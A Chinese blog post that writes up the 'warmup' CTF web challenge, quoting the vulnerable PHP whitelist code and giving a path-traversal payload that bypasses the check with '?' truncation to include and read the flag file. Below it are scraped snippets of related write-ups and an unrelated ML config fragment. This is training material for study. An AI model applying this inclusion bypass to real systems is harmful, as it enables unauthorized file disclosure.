web_进阶_warmup

最新推荐文章于 2024-05-19 11:48:51 发布
原创 最新推荐文章于 2024-05-19 11:48:51 发布 · 209 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了文件包含漏洞,通过代码审计和实验演示了如何利用该漏洞获取敏感信息。介绍了如何在HTML中发现漏洞,使用特定payload绕过过滤机制,最终成功读取目标文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

考察知识点:文件包含漏洞


F12打开,开发者窗口在HTML中发现

访问source.php,AND代码审计

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
        //白名单列表
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
          //传入的值要在白名单列表中
            if (in_array($page, $whitelist)) {
                return true;
            }
		//过滤问号的函数,提取?出现的第一个位置
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
			//url对$page解码
            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

查找hint.php

in_array() 函数:搜索数组中是否存在指定的值。
一级级查找ffffllllaaaagggg

payload: /?file=source.php?../…/…/…/…/ffffllllaaaagggg

找到flag

攻防世界:WEB——warmup
Zeker62的博客
08-17 653
题目:warmup,没有提示,点进去,一个表情包: 源代码里提示了一波,有个source.php的文件可以看 打开source.php,好家伙,代码审计 观察到有个hint.php的文件:打开它 并不是flag,但是提示我们flag在ffffllllaaaagggg里,看来要回到代码审计,仔细看代码了: 代码如下: <?php highlight_file(__FILE__); class emmm { public static function chec
攻防世界-web高手进阶
zji
04-25 7058
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
web_warmup
怪味巧克力的博客
05-25 463
0x01 进去以后一个笑脸,哈哈哈 接下来我们查看源码 发现注释部分提示我们有个source.php,我们查看一下,结果如图 发现源代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=&gt
攻防世界-web高手进阶篇-warmup
热门推荐
qq_42016346的博客
02-06 1万+
打开题目链接后只有一个滑稽??(那就看看它里面有啥吧) 想啥呢,是审查源码啦 可以看到有注释source.php,访问后可以看到其源码 又发现一个hint.php文件,先访问再说 提示我们flag在ffffllllaaaagggg里面,此时题目已经完成一半啦 接着看回source.php源码 可以看到最后的include 是可以动态构造参数的,那应该就是解题关键了 不...
[HCTF 2018]WarmUp(Web)
weixin_44728681的博客
02-23 227
BUUCTF [HCTF 2018]WarmUp(Web)
攻防世界——Web——warmup
慎铭的博客
02-23 302
  查看源码,提示source.php文件,打开后代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($pa
Web进阶题目思路(1~6)
xiao_xiao_lan的博客
04-04 581
Web进阶题目一、baby_web(难度:1)二、Training-WWW-Robots(难度:1)三、php_rce(难度:2) kalilinux中各个软件的功能用法-----后续网络下载并添加 kalilinux中各个软件的功能用法-----系统自带 Web知识点 一、baby_web(难度:1) 提示:想想初始页面是哪个 难度一星不高,看在刚结束入门进入进阶,所以前面不放难的,那我们也将...
【XCTF】 Web进阶区部分 WriteUp(一)
野原新之助
10-24 903
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在优快云,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2661
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界-web进阶
楼阁de猫的博客
10-30 1084
目录baby_webTraining-WWW-Robots baby_web 题目描述:想想初始页面是哪个 打开链接看到这个界面 这里有两种解法 法一:我们输入index.php ,就会立即跳转到1.php 那我们就对index.php抓包看看 在请求头看到flag:flag{very_baby_web} 法二:题目提示说初始界面,但是url后面会自动跳转到1.php,我们可以在控制台找到初始界面, 按F12进入控制台点开原始的网址就可以看到 Training-WWW-Robots 打开链接是这样一个
攻防世界---web---warmup
2201_75556700的博客
05-19 383
5、访问hint.php,提示flag在ffffllllaaaagggg这个文件下。2、查看源码,发现有个source.php。3、访问该文件,得到这一串代码。6、构造payload。
hctf-web-warmup
wyj_1216 House
02-04 490
题目 writeup 查看页面源代码 发现source.php 得到部分代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"...
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 1941
BUUCTF web题目之WarmUp
攻防世界之web warmup 详解
m0_52663093的博客
11-11 545
一 解题思路 我们进来之后会发现有一个滑稽表情哦 我的思路就是先点进去查看源代码 源代码如下: 二 详细步骤 我们打开源码之后 首先想到的就是去访问source.php 源码如下: 在这里我思考了好久 找到了一个php文件 于是同样思路继续访问 我们可以看到如下结论 在这里可以想到给了4个f l a g 于是我们可以试一下payload构造 简单说就是include文件包含是遇到 …/…/会将以.开头,则解析器会在当前目录的父目录下寻找该文件,所以我们要进行转义。或者...
【攻防世界】Web warmup
DG_s1mple
01-02 956
这一题主要是利用了include的特性如果include的文件名中含有“/”,那么它会识别其为一个带目录的文件,只有最后一个“/”后的字符串对应的文件会被包含,而前面的字符串都只是在指定目录意思是,如果我们的payload是这样的对于include来说,就只会识别"/"后面的内容,变成了解了这个特性之后,我们就可以开始做题了。
攻防世界-web-warmup
wuh2333的博客
05-24 457
攻防世界,warmup
BUUCTF—WEB-WarmUp
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7988
[CTF题目总结-web篇]攻防世界-warmup
CTFweb WarmUp解析
weixin_43404314的博客
12-19 478
首先查看源码 返回到图片页面打开source.php文件 发现还包含的有一个文件,于是再次返回图片页面打开hint.php 得到 %253F绕过 即可得flag. 第一次写,不喜勿喷 ...
num_classes: 30 project_path: "D:/pychj/pythorch" train_data_path: "DataSet/final/train" val_data_path: "DataSet/final/valid" test_data_path: "DataSet/final/test" #图片可视化分析源路径 img_path: "DataSet/final/test/0002_人参/人参31.jpg" #训练伦次 epochs: 30 #选用设备 device: 'cuda:0' #训练批次大小,防止显存溢出 batch_size: 16 #加载的权重路径 weights_path: '' #迁移学习 fine_tuning: True #优化器的选择 opt_name: 'AdamW' #线程加载 nw: 2 #模型保存路径 #vgg模型 Model_VGG: 'Model/Model_VGG/weights/VGG16_43481362425_best_model.pt' Model_AlexNet: 'Model/Model_AlexNet/weights/AlexNet_43491884900_best_model.pt' Model_MobileNet: 'Model/Model_MobileNet/weights/MobileNet_V3_Small_43544276625_best_model.pt' Model_ResNet: 'Model/Model_ResNet/weights/ResNet50_43544327450_best_model.pt' #可视化测验调用模型路径 Web_Model: 'Model/Model_VGG/weights/VGG16_43481362425_best_model.pt' #端口号 Web_Port: 8017 #不同类别的名称列表 display_labels: - '三七' - '乌梅' - '人参' - '何首乌' - '党参' - '决明子' - '小茴香' - '板蓝根' - '枸杞子' - '柴胡' - '桑葚' - '槐花' - '沉香' - '灵芝' - '甘草' - '白芍' - '白花蛇舌草' - '百合' - '穿心莲' - '红花' - '罗汉果' - '艾叶' - '茯苓' - '莲子心' - '葛根' - '虫草' - '蝉蜕' - '金银花' - '阿胶' - '陈皮' #混淆矩阵显示具数值 show_figure: false #混淆矩阵结果归一化 normalization: true 找出这里面的超参数
最新发布
03-15
12. `warmup_steps`:学习率预热步数 13. `gradient_accumulation_steps`:梯度累积步数 ```python training_args = TrainingArguments( gradient_accumulation_steps=2) # 模拟更大batch_size ``` 14. `fp16...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值